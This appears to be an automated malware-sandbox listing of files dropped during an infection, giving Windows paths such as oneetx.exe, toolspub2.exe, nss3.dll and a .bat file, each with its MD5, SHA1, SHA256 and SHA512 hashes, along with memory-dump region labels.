C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/1812-894-0x00000000047F0000-0x0000000004882000-memory.dmp

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

MD5 a102cea468c6316f61d17d489d8c3a81
SHA1 c3ed086200b03fe56c9f67ee548ebe2f1ac0f2cf
SHA256 75c0e005fbf106e0a74db8c2817946b9d6f4f574346802d0f0ae1b83deade365
SHA512 ba8d100470545cab99b9e24c40ce254679e038e9191ae1b14ab14eeec409a783aa9903589f74940a53a50e7b05fde6ad72560a39861957d5053bec00bf26de86

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\HCFBFBAEBKJKEBGCAEHCFCBAEH

MD5 60e20377222685886431e0cef3103548
SHA1 c049f3925bb263197ca81ba5978bde8e80385095
SHA256 80e6ef4efb13a72e98769c04c3b726a42a369e3185758d6cacd6e661124fa42a
SHA512 eceda0208a20a89c15577e1c702671816d5e782e62e9d41b2782f768f1748a8d8f52a3b8dd8fa140c80e2311e55db75613d21a15d4d3378f8ada05ae9d5e90f0

memory/3172-919-0x00000000096B0000-0x0000000009726000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 f0033521f40c06dec473854c7d98fa8b
SHA1 28dadfe642a0c308e1f744b0d87a6d22dd6cd55a
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
SHA512 f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 f0033521f40c06dec473854c7d98fa8b
SHA1 28dadfe642a0c308e1f744b0d87a6d22dd6cd55a
SHA256 4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e
SHA512 f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/2940-934-0x0000000000330000-0x0000000000851000-memory.dmp

memory/3672-936-0x00000000048F0000-0x0000000004986000-memory.dmp

memory/3172-937-0x0000000008CD0000-0x0000000008CEE000-memory.dmp

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
SHA512 aba1c44e1e893364a7e9f0f896d205c24949f77a3d0a64dd7883768a5e3ee43771812fe7ec57dcbc39fd218b643f621f11f7738e0c1be2cd647f353b8b245743

memory/756-942-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

MD5 627f02d5e9dde53111a2953059db9372
SHA1 ffed5b0eda9791c42fa928111fcc973c0682a585
SHA256 bfc09d350d8bcedb1dbaddcf85e4a993907ac0dceba795556947312855d9a7cd
SHA512 01a286dcc7196a187f44c1143ad53bbc43556f5c9338003bd9291f40105378bab60e569a0ee8d5f6f28c41ad6e131423e02666818bfc058e166f555579bef1ab

memory/3144-969-0x000002680B200000-0x000002680B222000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jtnroi3l.wdb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3144-970-0x00007FFE3A6E0000-0x00007FFE3B1A1000-memory.dmp

memory/3144-972-0x0000026823760000-0x0000026823770000-memory.dmp

memory/3144-977-0x0000026823760000-0x0000026823770000-memory.dmp

memory/4140-978-0x0000000000840000-0x0000000000940000-memory.dmp

memory/4140-980-0x0000000000810000-0x0000000000819000-memory.dmp

memory/3144-981-0x0000026823760000-0x0000026823770000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/4536-986-0x0000000000400000-0x0000000000409000-memory.dmp

memory/756-993-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3144-994-0x0000026823760000-0x0000026823770000-memory.dmp

memory/3144-1001-0x00007FFE3A6E0000-0x00007FFE3B1A1000-memory.dmp

memory/4536-1034-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3172-1038-0x0000000009780000-0x00000000097D0000-memory.dmp

memory/3172-1047-0x00000000099A0000-0x0000000009B62000-memory.dmp

memory/3172-1056-0x000000000A0A0000-0x000000000A5CC000-memory.dmp

memory/4668-1061-0x00007FFE3A6E0000-0x00007FFE3B1A1000-memory.dmp

memory/4668-1062-0x000001EE7ED90000-0x000001EE7EDA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

MD5 fa0f9adea2e58ed44c52716416964850
SHA1 07d4df5af7cc0c1e43d8b4a88798f2f5f84e8b31
SHA256 df75b62e373e0b91f26384b21aaa8e4dc86c13078cec7e32ad595d0c86d3fedb
SHA512 63f476c5e212d67eefe8723c21a65a7c5ccaea543cb8901410c6ed1378a7b0d8e0a130dab08d59ecc09dc3feac4282aebdf645d2f9cfd330224f2f161dad4185

C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe

MD5 a7ee1f4bf11bdfab2327d098c6583af1
SHA1 b59a2989c0f48597f691d3ead8f549f2327c6d0a
SHA256 d74686c87f0777d1e8c4fcc18b40fe3ce97d6e531e23b6665037e5599b72aa32
SHA512 b9d4c65a167ccd15891c97ebcdbe02e46d1411c13284c986039c4e172cf7cfbd450aab80af71f95d13c001a39ff0a01a44288f19b6432a08c0bd32895d7a8ec9

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\D7D0.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155